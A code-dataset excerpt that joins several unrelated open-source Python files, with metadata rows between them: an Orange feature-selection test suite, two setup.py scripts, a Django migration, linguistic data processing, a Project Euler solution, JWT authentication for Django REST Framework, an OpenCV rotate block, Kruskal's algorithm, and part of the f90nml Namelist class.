# pylint: disable=missing-docstring
import unittest
import numpy as np
from scipy.sparse import csr_matrix
from Orange.data import Table, Variable
from Orange.preprocess.score import ANOVA, Gini, UnivariateLinearRegression, \
Chi2
from Orange.preprocess import SelectBestFeatures, Impute, RemoveNaNColumns, SelectRandomFeatures
class TestFSS(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.titanic = Table('titanic')
cls.wine = Table('wine')
cls.iris = Table('iris')
cls.auro_mpg = Table('auto-mpg')
def setUp(self):
Variable._clear_all_caches()
def test_select_1(self):
gini = Gini()
s = SelectBestFeatures(method=gini, k=1)
data2 = s(self.titanic)
best = max((gini(self.titanic, f), f) for f in self.titanic.domain.attributes)[1]
self.assertEqual(data2.domain.attributes[0], best)
def test_select_threshold(self):
anova = ANOVA()
t = 30
data2 = SelectBestFeatures(method=anova, threshold=t)(self.wine)
self.assertTrue(all(anova(self.wine, f) >= t for f in data2.domain.attributes))
def test_error_when_using_regression_score_on_classification_data(self):
s = SelectBestFeatures(method=UnivariateLinearRegression(), k=3)
with self.assertRaises(ValueError):
s(self.wine)
def test_discrete_scores_on_continuous_features(self):
c = self.iris.columns
for method in (Gini(), Chi2()):
d1 = SelectBestFeatures(method=method)(self.iris)
expected = \
(c.petal_length, c.petal_width, c.sepal_length, c.sepal_width)
self.assertSequenceEqual(d1.domain.attributes, expected)
scores = method(d1)
self.assertEqual(len(scores), 4)
score = method(d1, c.petal_length)
self.assertIsInstance(score, float)
def test_continuous_scores_on_discrete_features(self):
data = Impute()(self.auro_mpg)
with self.assertRaises(ValueError):
UnivariateLinearRegression()(data)
d1 = SelectBestFeatures(method=UnivariateLinearRegression())(data)
self.assertEqual(len(d1.domain), len(data.domain))
def test_defaults(self):
fs = SelectBestFeatures(k=3)
data2 = fs(Impute()(self.auro_mpg))
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.wine)
self.assertTrue(all(a.is_continuous for a in data2.domain.attributes))
data2 = fs(self.titanic)
self.assertTrue(all(a.is_discrete for a in data2.domain.attributes))
class TestRemoveNaNColumns(unittest.TestCase):
def test_column_filtering(self):
data = Table("iris")
data.X[:, (1, 3)] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes) - 2)
data = Table("iris")
data.X[0, 0] = np.NaN
new_data = RemoveNaNColumns()(data)
self.assertEqual(len(new_data.domain.attributes),
len(data.domain.attributes))
def test_column_filtering_sparse(self):
data = Table("iris")
data.X = csr_matrix(data.X)
new_data = RemoveNaNColumns()(data)
self.assertEqual(data, new_data)
class TestSelectRandomFeatures(unittest.TestCase):
def test_select_random_features(self):
data = Table("voting")
for k_features, n_attributes in ((3, 3), (0.25, 4)):
srf = SelectRandomFeatures(k=k_features)
new_data = srf(data)
self.assertEqual(len(new_data.domain.attributes), n_attributes)
| bsd-2-clause | 5,897,100,212,451,810,000 | 34.87619 | 96 | 0.640297 | false | 3.615163 | true | false | false |
jeetsukumaran/Ginkgo | ginkgopy/setup.py | 1 | 2611 | #! /usr/bin/env python
###############################################################################
##
## GINKGO Biogeographical Evolution Simulator Post-Processing Library.
##
## Copyright 2009 Jeet Sukumaran and Mark T. Holder.
##
## This program is free software; you can redistribute it and#or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program. If not, see <http:##www.gnu.org#licenses#>.
##
###############################################################################
"""
Package setup and installation.
"""
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup
from setuptools import find_packages
from ginkgo import PACKAGE_VERSION
import sys
import os
import subprocess
script_names = ['ginkgo-ascii-grid.py', 'ginkgo-grid-coordinates.py']
setup(name='Ginkgo',
version=PACKAGE_VERSION,
author='Jeet Sukumaran and Mark T. Holder',
author_email='jeet@ku.edu and mtholder@ku.edu',
url='',
description="""\
A library to faciliate setting up runs and processing results of the GINKGO Biogeographical Evolution Simulator""",
license='GPL 3+',
packages=['ginkgo'],
package_dir={'ginkgo': 'ginkgo'},
package_data={
"" : ['doc/*'],
"ginkgo" : ["tests/data/*"]
},
scripts = [('scripts/%s' % i) for i in script_names],
test_suite = "ginkgo.tests",
include_package_data=True,
zip_safe=True,
install_requires=[
"DendroPy >= 3.0.0",
],
entry_points="""
# -*- Entry points: -*-
""",
long_description=open('README.txt', 'rU').read(),
classifiers = [
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: GNU General Public License (GPL)",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Scientific/Engineering :: Bio-Informatics",
],
keywords='phylogenetics evolution biology biogeography',
)
| gpl-3.0 | -7,690,661,539,944,862,000 | 33.813333 | 115 | 0.607047 | false | 4.079688 | false | false | false |
hpfn/charcoallog | charcoallog/bank/migrations/0001_initial.py | 1 | 1232 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-01-21 11:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('core', '0012_auto_20180121_1155')
]
operations = [
migrations.CreateModel(
name='Extract',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_name', models.CharField(max_length=30, verbose_name='Name')),
('date', models.DateField(verbose_name='Date')),
('money', models.DecimalField(decimal_places=2, max_digits=12, verbose_name='Money')),
('description', models.CharField(max_length=70, verbose_name='Description')),
('category', models.CharField(max_length=70, verbose_name='Category')),
('payment', models.CharField(max_length=70, verbose_name='Payment')),
],
options={
'ordering': ['-date'],
},
),
]
operations = [
migrations.SeparateDatabaseAndState(state_operations=operations)
]
| gpl-3.0 | 1,365,360,019,991,636,500 | 33.222222 | 114 | 0.575487 | false | 4.248276 | false | false | false |
digling/sinotibetan | datasets/bai/modify_bai.py | 1 | 3172 | from lib.sino import db
import lingpyd as lingpy
numbersup = '¹²³⁴⁵⁶⁰'
numbersdown = '₁₂₃₄₅₆₀'
for k in db:
subgroup = db[k,'subgroup']
if subgroup == 'Bai':
# modify tokens
tks = db[k,'tokens']
if tks not in ['-','']:
tks = tks.split(' ')
ntk = []
while tks:
tk = tks.pop(0)
if tk[0] in numbersdown:
for a,b in zip(numbersdown,numbersup):
tk = tk.replace(a,b)
ntk += [tk]
# expand nasals
elif "\u0303" in tk or tk[0] in "ãũẽĩõ":
ntk += [tk,lingpy.rc('nasal_placeholder')]
else:
ntk += [tk]
db[k][db.header['tokens']] = ' '.join(ntk)
# same for ipa
ipa = db[k,'ipa']
for a,b in zip(numbersdown, numbersup):
ipa.replace(a,b)
db[k][db.header['ipa']] = ipa
db._clean_cache()
# assemble cognate ids and align them again for bai
alms = {}
etd = db.get_etymdict(ref='cogid')
for k in etd:
print ("Carrying out alignment for {0}".format(k))
idxs = [idx[0] for idx in etd[k] if idx]
nidxs, alms = [], []
for idx in idxs:
alm = db[idx,'tokens']
sbg = db[idx,'subgroup']
if alm != '-' and alm and sbg=='Bai':
nidxs += [idx]
alms += [alm]
if alms:
msa = lingpy.Multiple(alms)
msa.lib_align()
for idx,alm in zip(nidxs,msa.alm_matrix):
db[idx][db.header['alignment']] = ' '.join(alm)
cidx = db._rowIdx
ignore = []
for k in db:
c = db[k, 'concept']
if c == 'to plant (grow)':
db[k][cidx] = 'to plant'
elif c == 'lie, rest':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
ignore += [k]
elif c == 'to the dream':
db[k][cidx] = 'the dream'
elif c == 'to suck':
if db[k,'ipa'] == '-' or db[k,'ipa'] == '':
db[k][cidx] = 'to lick'
elif c == 'to work':
db[k][cidx] = 'the work'
# search for potential duplicates
dups = {}
for d in db.doculect:
# get data flat
idxs = db.get_list(doculect=d, flat=True)
tks = db.get_list(doculect=d, flat=True, entry='tokens')
# iterate over all tokens and search for identical words
dup = {}
for idx,tk in zip(idxs,tks):
if tk not in ['-','']:
try:
dup[tk] += [idx]
except KeyError:
dup[tk] = [idx]
for k in dup:
if k not in ['-','']:
if len(dup[k]) > 1:
basei = dup[k][0]
basec = db[basei,'concept']
base = '{0} ({1})'.format(basei, basec)
for idx in dup[k][1:]:
dups[idx] = base
for k in db:
if k not in dups:
dups[k] = ''
if db[k,'ipa'] == '0':
db[k][db.header['ipa']] = ''
db[k][db.header['tokens']] = ''
db.add_entries('duplicates', dups, lambda x: x)
# add line for duplicates
db.update('sinotibetan',verbose=True, delete=ignore)
| gpl-2.0 | 8,496,444,828,046,954,000 | 26.79646 | 62 | 0.463228 | false | 3.055447 | false | false | false |
milkmeat/thomas | project euler/q51.py | 1 | 1040 | def listprime(lp):
prime=[True]*lp
prime[0]=False
prime[1]=False
for x in range(lp):
if prime[x]:
bei=x+x
while bei<lp:
prime[bei]=False
bei+=x
return prime
def replaceStar(s):
result=[]
if '*' in s:
for n in range(0,9+1):
news = s.replace('*', str(n))
if news[0]!='0':
result.append(news)
else:
result.append(s)
return result
primes=listprime(10000000)
def countPrime(list):
result=[]
for s in list:
if primes[int(s)]:
result.append(s)
return result
# print countPrime(replaceStar('56**3'))
# print countPrime(replaceStar('*3'))
def generate(g):
if g==0:
yield ''
return
for other in generate(g-1):
for first in '1234567890*':
yield first+other
for x in generate(6):
if len(countPrime(replaceStar(x)))==8:
print countPrime(replaceStar(x))
| mit | -4,113,597,390,468,659,000 | 19.666667 | 42 | 0.500962 | false | 3.623693 | false | false | false |
Jdsleppy/sweetmorse | setup.py | 1 | 2423 | from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
long_description = """sweetmorse
----------
Morse code tools from read to write, analog to digital.
.. image:: https://www.travis-ci.org/Jdsleppy/sweetmorse.svg?branch=master
:target: https://www.travis-ci.org/Jdsleppy/sweetmorse
Compatibility
-------------
Targets Python3, tested against against Python 3.3-3.6.
More info
---------
See a crash course at https://github.com/Jdsleppy/sweetmorse
"""
setup(
name='sweetmorse',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='1.1.0',
description='Morse code tools from read to write, analog to digital',
long_description=long_description,
url='https://github.com/Jdsleppy/sweetmorse',
author='Joel Sleppy',
author_email='jdsleppy@gmail.com',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: Communications :: Ham Radio',
'Topic :: Multimedia :: Sound/Audio',
# (should match "license" above)
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
keywords='morse signal electronics',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['tests']),
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
python_requires='~=3.0',
package_data={},
data_files=[],
entry_points={
'console_scripts': [
'sweetmorse = sweetmorse.main:main',
],
},
)
| mit | 7,612,446,665,855,582,000 | 27.174419 | 79 | 0.645481 | false | 3.762422 | false | false | false |
MenloAthertonCoding/cruzebase | authtoken/authentication.py | 1 | 5202 | from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from rest_framework import authentication
from rest_framework.exceptions import AuthenticationFailed
from jwt.exceptions import TokenException
from jwt import BaseToken, compare, token_factory
from auth.models import UserProfile
from authtoken.settings import api_settings, secret_key
def get_token_instance(user_profile):
return token_factory(
api_settings.TOKEN_HEADER_CLAIMSET_CLASS,
api_settings.TOKEN_PAYLOAD_CLAIMSET_CLASS,
{
'payload': {'aud': api_settings.TOKEN_AUDIENCE or user_profile.id}
}
)
def validate_user(user):
"""Validates a user is active and can be used to authenticate.
"""
# From Django 1.10 onwards the `authenticate` call simply
# returns `None` for is_active=False users.
# (Assuming the default `ModelBackend` authentication backend.)
if not user.is_active:
raise ValidationError('User account is disabled.')
def authenticate_credentials(kwargs):
"""
Returns a UserProfile object from the given kwargs if the UserProfile object
exists and is valid. AuthTokenSerializer validates UserProfile object.
"""
try:
user_profile = UserProfile.objects.get(**kwargs)
except UserProfile.DoesNotExist:
raise AuthenticationFailed('User non existant')
try:
validate_user(user_profile.user)
except ValidationError as exc:
raise AuthenticationFailed(_(str(exc)))
return user_profile
class JSONWebTokenAuthentication(authentication.BaseAuthentication):
"""
JSON Web Token based authentication conforming to RFC 7519.
See https://jwt.io/introduction/ and https://openid.net/specs/draft-jones-json-web-token-07.html
for more about JWTs.
Clients should authenticate by passing the JWT token key in the "Authorization"
HTTP header, prepended with the string "Bearer ".
For example:
Authorization: Bearer eyJhbGciO.eyJzdWIiOiIxMjM0NTY3ODkwIiwib.TJVA95OrM7E2cBab3
"""
keyword = 'Bearer'
www_authenticate_realm = 'api'
def authenticate(self, request):
"""
Authenticate the request if the signature is valid and return a two-tuple of (user, token).
"""
auth = authentication.get_authorization_header(request).split()
if not auth or auth[0].lower() != self.keyword.lower().encode():
return None
token = self.validate_bearer(auth)
try:
# TODO Remove this, and don't verify audience as it is not
# verified yet.
user_profile = self.get_token_user(request, token)
if user_profile is not None:
token_instance = get_token_instance(user_profile)
# Verify token
if compare(token, token_instance, secret_key(),
api_settings.TOKEN_VERIFICATION_ALGORITHM_INSTANCE):
return (user_profile.user, token)
except AuthenticationFailed as exc:
raise AuthenticationFailed(_(str(exc) or 'Provided credentials invalid.'))
except TokenException as exc:
raise AuthenticationFailed(_(str(exc)))
def get_token_user(self, request, token):
"""Gets the user specified in the request headers or, more commmonly,
in the token payload itself.
"""
# Get username or user id in request headers
username = request.META.get('X_USERNAME')
user_id = request.META.get('HTTP_USER_ID') # ex. USER-ID: 100
payload = BaseToken.clean(token)[1]
user_profile = None
# Get user from username, user_id, or from token payload.
if username:
user_profile = authenticate_credentials({'user__username': username})
elif user_id:
user_profile = authenticate_credentials({'id': user_id})
elif payload.get('aud'):
user_profile = authenticate_credentials({'id': payload.get('aud')})
return user_profile
def validate_bearer(self, bearer):
"""Ensure the token passed through request headers is valid and is parsable.
If the token is not valid or not parsable, `AuthenticationFailed` is raised.
"""
if len(bearer) == 1:
msg = _('Invalid token header. No credentials provided.')
raise AuthenticationFailed(msg)
elif len(bearer) > 2:
msg = _('Invalid token header. Token string should not contain spaces.')
raise AuthenticationFailed(msg)
try:
token = bearer[1]
except UnicodeError:
msg = _('Invalid token header. Token string should not contain invalid characters.')
raise AuthenticationFailed(msg)
return token
def authenticate_header(self, request):
"""Return a string to be used as the value of the `WWW-Authenticate`
header in a `401 Unauthenticated` response, or `None` if the
authentication scheme should return `403 Permission Denied` responses.
"""
return '{0} realm="{1}"'.format(self.keyword, self.www_authenticate_realm)
| apache-2.0 | 8,676,209,387,682,481,000 | 36.157143 | 100 | 0.656863 | false | 4.386172 | false | false | false |
Lucasgscruz/harpia | harpia/bpGUI/rotate.py | 2 | 9475 | # -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges (lcdjunges@yahoo.com.br), Clovis Peruchi Scotti (scotti@ieee.org),
# Guilherme Augusto Rutzen (rutzen@das.ufsc.br), Mathias Erdtmann (erdtmann@gmail.com) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti (scotti@ieee.org), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/rotate.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
'isAtCenter',
'isAtPoint',
'isScalling',
'isFilling',
'xC',
'yC',
'BackgroundColor',
'BorderColor',
'HelpView',
'prop_confirm'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
for Property in self.block_properties:
if Property.name == "xC":
self.widgets['xC'].set_value(float(Property.value));
if Property.name == "yC":
self.widgets['yC'].set_value(float(Property.value));
if Property.name == "isFilling":
if Property.value == "true":
self.widgets['isFilling'].set_active(True);
else:
self.widgets['isFilling'].set_active(False);
if Property.name == "isScalling":
if Property.value == "true":
self.widgets['isScalling'].set_active(True);
else:
self.widgets['isScalling'].set_active(False);
if Property.name == "isCenter":
if Property.value == "true":
self.widgets['isAtCenter'].set_active(True);
else:
self.widgets['isAtPoint'].set_active(True);
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/rotate" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#------------------------Help Text----------------------------------------------
def getHelp(self):#adicionado help
return "Detecta formas circulares na imagem de entrada.\
Saida 1 é a resposta da avaliacao(*) e a saida dois mostra os circulos encontrados."
# ----------------------------------------------------------------------
def __del__(self):
pass
# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
self.widgets['prop_confirm'].grab_focus()
for Property in self.block_properties:
if Property.name == "xC":
Property.value = unicode(self.widgets['xC'].get_value())
if Property.name == "yC":
Property.value = unicode(self.widgets['yC'].get_value())
if Property.name == "isCenter":
if self.widgets['isAtCenter'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isFilling":
if self.widgets['isFilling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
if Property.name == "isScalling":
if self.widgets['isScalling'].get_active():
Property.value = u"true"
else:
Property.value = u"false"
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
blockTemplate.header += "#define PI 3.1415926535898\n"
blockTemplate.header += "double rads(double degs){\n"
blockTemplate.header += " return (PI/180 * degs);\n"
blockTemplate.header += "}\n\n"
for propIter in blockTemplate.properties:
if propIter[0] == 'xC':
xC = propIter[1]
elif propIter[0] == 'yC':
yC = propIter[1]
elif propIter[0] == 'isFilling':
isFilling = propIter[1]
elif propIter[0] == 'isCenter':
isCenter = propIter[1]
elif propIter[0] == 'isScalling':
isScalling = propIter[1]
blockTemplate.imagesIO = '\nIplImage * block$$_img_i1 = NULL;\n' + \
'double block$$_double_i2;\n' + \
'IplImage * block$$_img_o1 = NULL;\n'
blockTemplate.imagesIO += '\n\n'
blockTemplate.functionCall = '\n if(block$$_img_i1)\n {\n' + \
' double scale;\n int H;\n int W;\n' + \
' W = block$$_img_i1->width;\n' + \
' H = block$$_img_i1->height;\n' + \
' block$$_img_o1 = cvCreateImage(cvSize(W,H),block$$_img_i1->depth,block$$_img_i1->nChannels);\n' + \
' CvMat* mat = cvCreateMat(2,3,CV_32FC1);\n'
if isCenter == "true":
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(W/2, H/2);\n'
else:
blockTemplate.functionCall += ' CvPoint2D32f center = cvPoint2D32f(' + str(int(float(xC))) + ',' + str(
int(float(yC))) + ');\n'
if isScalling == "true":
blockTemplate.functionCall += ' scale = H/(fabs(H*sin(rads(90-abs(block$$_double_i2)))) + fabs(W*sin(rads(abs(block$$_double_i2)))));\n' + \
' cv2DRotationMatrix(center,block$$_double_i2,scale,mat);\n'
else:
blockTemplate.functionCall += ' cv2DRotationMatrix(center,block$$_double_i2,1.0,mat);\n'
if isFilling == "true":
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,CV_WARP_FILL_OUTLIERS,cvScalarAll(0));\n'
else:
blockTemplate.functionCall += ' cvWarpAffine(block$$_img_i1,block$$_img_o1,mat,0,cvScalarAll(0));\n'
blockTemplate.functionCall += ' }\n'
blockTemplate.dealloc = 'cvReleaseImage(&block$$_img_o1);\n' + \
'cvReleaseImage(&block$$_img_i1);\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Rotate Image"),
"Path": {"Python": "rotate",
"Glade": "glade/rotate.ui",
"Xml": "xml/rotate.xml"},
"Icon": "images/rotate.png",
"Color": "90:5:10:150",
"InTypes": {0: "HRP_IMAGE", 1: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_IMAGE"},
"Description": _("Rotates input image the input angle degrees. (More options inside)"),
"TreeGroup": _("Experimental")
}
| gpl-2.0 | 1,089,525,163,356,173,600 | 38.475 | 149 | 0.519105 | false | 3.785058 | false | false | false |
dsysoev/fun-with-algorithms | graph/kruskal.py | 1 | 2967 |
"""
Kruskal's algorithm
https://en.wikipedia.org/wiki/Kruskal%27s_algorithm
"""
from __future__ import print_function
class Graph(object):
""" Simple implementation of directed acyclic graph
Parameters
----------
nodes : set
set of all nodes in the graph
dependencies : list
list of tuples (weight, node1, node2) which show connection
between nodes of the graph with appropriate weight
"""
def __init__(self, nodes, dependencies):
self.nodes = nodes
self.dependencies = dependencies
self.parent = {}
self.rank = {}
def __str__(self):
""" string representation of the graph """
string = ''
for node in sorted(self.nodes):
strnode = ["{} -> {} ({})".format(start, end, w)
for w, start, end in self.dependencies if start == node]
string += "node {}: {}\n".format(node, " ".join(strnode))
return string[:-1]
def find(self, edge):
""" for current edge return parent edge """
if self.parent[edge] != edge:
self.parent[edge] = self.find(self.parent[edge])
return self.parent[edge]
def union(self, edge1, edge2):
""" union edge1 and edge2 into one tree """
root1 = self.find(edge1)
root2 = self.find(edge2)
if root1 == root2:
return
if self.rank[root1] > self.rank[root2]:
self.parent[root2] = root1
else:
self.parent[root1] = root2
if self.rank[root1] == self.rank[root2]:
self.rank[root2] += 1
def minimum_spanning_tree(self):
""" a minimum spanning tree
Returns
-------
out : set
return a set of tuples (weight, node1, node2)
with minimum spanning tree for a connected weighted graph
"""
# make_set
self.parent = {node: node for node in self.nodes}
self.rank = {node: 0 for node in self.nodes}
# sort edges
# weight should be first item in tuple
edges = self.dependencies
edges.sort()
# set initial tree
minimum_spanning_tree = set()
for weight, edge1, edge2 in edges:
if self.find(edge1) != self.find(edge2):
# union edge1 and edge2
self.union(edge1, edge2)
# add new dependence to the tree
minimum_spanning_tree.add((weight, edge1, edge2))
return minimum_spanning_tree
if __name__ in '__main__':
GRAPH_NODES = {0, 1, 2, 3, 4, 5, 6, 7}
# [(weight, node1, node2), ...]
GRAPH_DEPENDECIES = [(4, 0, 4), (7, 4, 2), (6, 2, 6), (8, 0, 1),
(3, 1, 5), (7, 5, 7), (6, 5, 6), (8, 5, 2)]
GRAPH = Graph(GRAPH_NODES, GRAPH_DEPENDECIES)
print("Show graph:\n{}\n".format(GRAPH))
print("Minimum spanning tree: {}".format(GRAPH.minimum_spanning_tree()))
| mit | -5,975,846,086,834,512,000 | 31.604396 | 79 | 0.539939 | false | 3.774809 | false | false | false |
marshallward/f90nml | f90nml/namelist.py | 1 | 34448 | """Fortran namelist interface.
The ``Namelist`` is a representation of a Fortran namelist and its contents in
a Python environment.
:copyright: Copyright 2014 Marshall Ward, see AUTHORS for details.
:license: Apache License, Version 2.0, see LICENSE for details.
"""
from __future__ import print_function
import itertools
import copy
import numbers
import os
import platform
try:
from StringIO import StringIO # Python 2.x
except ImportError:
from io import StringIO # Python 3.x
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
try:
basestring # Python 2.x
except NameError:
basestring = str # Python 3.x
class Namelist(OrderedDict):
"""Representation of Fortran namelist in a Python environment.
Namelists can be initialised as empty or with a pre-defined `dict` of
`items`. If an explicit default start index is required for `items`, then
it can be initialised with the `default_start_index` input argument.
In addition to the standard methods supported by `dict`, several additional
methods and properties are provided for working with Fortran namelists.
"""
class RepeatValue(object):
"""Container class for output using repeat counters."""
def __init__(self, n, value):
"""Create the RepeatValue object."""
self.repeats = n
self.value = value
def __init__(self, *args, **kwds):
"""Create the Namelist object."""
s_args = list(args)
# If using (unordered) dict, then resort the keys for reproducibility
# NOTE: Python 3.7+ dicts are order-preserving.
if (args and not isinstance(args[0], OrderedDict) and
isinstance(args[0], dict)):
s_args[0] = sorted(args[0].items())
# Assign the default start index
try:
self._default_start_index = kwds.pop('default_start_index')
except KeyError:
self._default_start_index = None
super(Namelist, self).__init__(*s_args, **kwds)
# We internally track the list of cogroups (groups of the same name),
# although this could be replaced with a per-access search.
self._cogroups = []
self.start_index = self.pop('_start_index', {})
# Update the complex tuples as intrinsics
# TODO: We are effectively setting these twice. Instead, fetch these
# from s_args rather than relying on Namelist to handle the content.
if '_complex' in self:
for key in self['_complex']:
if all(isinstance(v, list) for v in self[key]):
self[key] = [complex(*v) for v in self[key]]
else:
self[key] = complex(*self[key])
self.pop('_complex')
# Formatting properties
self._column_width = 72
self._indent = 4 * ' '
self._end_comma = False
self._uppercase = False
self._float_format = ''
self._logical_repr = {False: '.false.', True: '.true.'}
self._index_spacing = False
self._repeat_counter = False
self._split_strings = False
# Namelist group spacing flag
self._newline = False
# Check for pre-set indentation
self.indent = self.pop('_indent', self.indent)
# PyPy 2 is dumb and does not use __setitem__() inside __init__()
# This loop will explicitly convert any internal dicts to Namelists.
if (platform.python_implementation() == 'PyPy' and
platform.python_version_tuple()[0] == '2'):
for key, value in self.items():
self[key] = value
def __contains__(self, key):
"""Case-insensitive interface to OrderedDict."""
return super(Namelist, self).__contains__(key.lower())
def __delitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
lkey = key.lower()
if lkey in self._cogroups:
# Remove all cogroup values
cogrp = Cogroup(self, lkey)
for gkey in cogrp.keys:
super(Namelist, self).__delitem__(gkey)
self._cogroups.remove(lkey)
else:
super(Namelist, self).__delitem__(key)
def __getitem__(self, key):
"""Case-insensitive interface to OrderedDict."""
if isinstance(key, basestring):
lkey = key.lower()
if lkey in self._cogroups:
return Cogroup(self, lkey)
else:
return super(Namelist, self).__getitem__(lkey)
else:
keyiter = iter(key)
grp, var = next(keyiter).lower(), next(keyiter).lower()
return super(Namelist, self).__getitem__(grp).__getitem__(var)
def __setitem__(self, key, value):
"""Case-insensitive interface to OrderedDict.
Python dict inputs to the Namelist, such as derived types, are also
converted into Namelists.
"""
# Promote dicts to Namelists
if isinstance(value, dict) and not isinstance(value, Namelist):
value = Namelist(
value,
default_start_index=self.default_start_index
)
# Convert list of dicts to list of namelists
# (NOTE: This may be for legacy cogroup support? Can it be dropped?)
elif is_nullable_list(value, dict):
for i, v in enumerate(value):
if isinstance(v, Namelist) or v is None:
value[i] = v
else:
# value is a non-Namelist dict
value[i] = Namelist(
v,
default_start_index=self.default_start_index
)
lkey = key.lower()
super(Namelist, self).__setitem__(lkey, value)
def __str__(self):
"""Print the Fortran representation of the namelist.
Currently this can only be applied to the full contents of the namelist
file. Indiviual namelist groups or values may not render correctly.
"""
output = StringIO()
if all(isinstance(v, Namelist) for v in self.values()):
self._writestream(output)
else:
print(repr(self), file=output)
nml_string = output.getvalue().rstrip()
output.close()
return nml_string
# Format configuration
@property
def column_width(self):
"""Set the maximum number of characters per line of the namelist file.
:type: ``int``
:default: 72
Tokens longer than ``column_width`` are allowed to extend past this
limit.
"""
return self._column_width
@column_width.setter
def column_width(self, width):
"""Validate and set the column width."""
if isinstance(width, int):
if width >= 0:
self._column_width = width
else:
raise ValueError('Column width must be nonnegative.')
else:
raise TypeError('Column width must be a nonnegative integer.')
@property
def default_start_index(self):
"""Set the default start index for vectors with no explicit index.
:type: ``int``, ``None``
:default: ``None``
When the `default_start_index` is set, all vectors without an explicit
start index are assumed to begin with `default_start_index`. This
index is shown when printing the namelist output.
If set to `None`, then no start index is assumed and is left as
implicit for any vectors undefined in `start_index`.
"""
return self._default_start_index
@default_start_index.setter
def default_start_index(self, value):
if not isinstance(value, int):
raise TypeError('default_start_index must be an integer.')
self._default_start_index = value
@property
def end_comma(self):
"""Append commas to the end of namelist variable entries.
:type: ``bool``
:default: ``False``
Fortran will generally disregard any commas separating variable
